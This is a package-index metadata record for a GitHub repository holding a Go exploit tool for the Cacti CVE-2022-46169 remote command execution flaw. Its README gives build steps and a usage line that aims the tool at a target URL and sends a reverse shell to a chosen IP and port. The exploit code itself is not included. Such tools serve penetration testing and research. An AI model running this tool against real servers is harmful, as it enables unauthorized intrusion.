{"id":25911431,"url":"https://github.com/copyleftdev/pricklypwn","last_synced_at":"2025-08-01T04:10:02.046Z","repository":{"id":193906878,"uuid":"689709304","full_name":"copyleftdev/PricklyPwn","owner":"copyleftdev","description":"An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids security researchers in analyzing and understanding the depth of the CVE-2022-46169 flaw. Use responsibly and ethically.","archived":false,"fork":false,"pushed_at":"2023-09-10T17:14:08.000Z","size":3,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-06-04T16:21:26.497Z","etag":null,"topics":["cacti","command-injection","cve-2022-46169","cybersecurity","ethical-hacking","exploitation-tool","payload","penetration-testing","rce","remote-command-execution","reverse-shell","security","vulnerability-assessment"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/copyleftdev.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-09-10T17:00:50.000Z","updated_at":"2024-04-29T05:12:05.000Z","dependencies_parsed_at":"2023-09-10T19:00:33.216Z","dependency_job_id":null,"html_url":"https://github.com/copyleftdev/PricklyPwn","commit_stats":null,"previous_names":["copyleftdev/pricklypwn"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/copyleftdev/PricklyPwn","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/copyleftdev%2FPricklyPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/copyleftdev%2FPricklyPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/copyleftdev%2FPricklyPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/copyleftdev%2FPricklyPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/copyleftdev","download_url":"https://codeload.github.com/copyleftdev/PricklyPwn/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/copyleftdev%2FPricklyPwn/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261782647,"owners_count":23208907,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cacti","command-injection","cve-2022-46169","cybersecurity","ethical-hacking","exploitation-tool","payload","penetration-testing","rce","remote-command-execution","reverse-shell","security","vulnerability-assessment"],"created_at":"2025-03-03T09:17:30.414Z","updated_at":"2025-06-25T00:36:55.516Z","avatar_url":"https://github.com/copyleftdev.png","language":"Go","readme":"Sure! Here's a \"dope\" README.md for your `PricklyPwn` project:\n\n---\n\n# 🌵 PricklyPwn 🌵\n\n![Banner](path_to_your_project_banner.png)\n\n*Penetrate with precision. A Remote Command Execution Exploit for Cacti v1.2.22.*\n\n---\n\n## Table of Contents\n1. [Description](#description)\n2. [Installation](#installation)\n3. [Usage](#usage)\n4. [Ethical Notice](#ethical-notice)\n\n---\n\n## Description\n\n**PricklyPwn** is a sleek, high-performance tool crafted in Go, designed to exploit the Remote Command Execution (RCE) vulnerability found in Cacti versions up to v1.2.22. Built for security enthusiasts, ethical hackers, and defenders, it assists in comprehending and remediating the CVE-2022-46169 vulnerability.\n\n---\n\n## Installation\n\n```bash\n# Clone this repository\ngit clone https://github.com/your_username/PricklyPwn.git\n\n# Navigate to the PricklyPwn directory\ncd PricklyPwn\n\n# Build the Go binary\ngo build -o PricklyPwn main.go\n```\n\n---\n\n## Usage\n\n```bash\n# Basic usage\n./PricklyPwn -url \u003ctarget_url\u003e -remote_ip \u003creverse_shell_ip\u003e -remote_port \u003creverse_shell_port\u003e\n```\n\nFor more advanced options, refer to the documentation.\n\n---\n\n## 🚨 Ethical Notice 🚨\n\nThis tool is strictly intended for educational and legal, authorized penetration testing purposes. Always get explicit permission before attempting any kind of testing. Unauthorized hacking is illegal and unethical. The `PricklyPwn` team cannot and will not bear responsibility for misuse.\n\n\n---\n\n## Acknowledgments\n\n- Thanks to all security researchers who continuously push the boundaries and inspire tools like this.\n- Special shoutout to the Cacti team for their commitment to making the internet a safer place.\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcopyleftdev%2Fpricklypwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcopyleftdev%2Fpricklypwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcopyleftdev%2Fpricklypwn/lists"}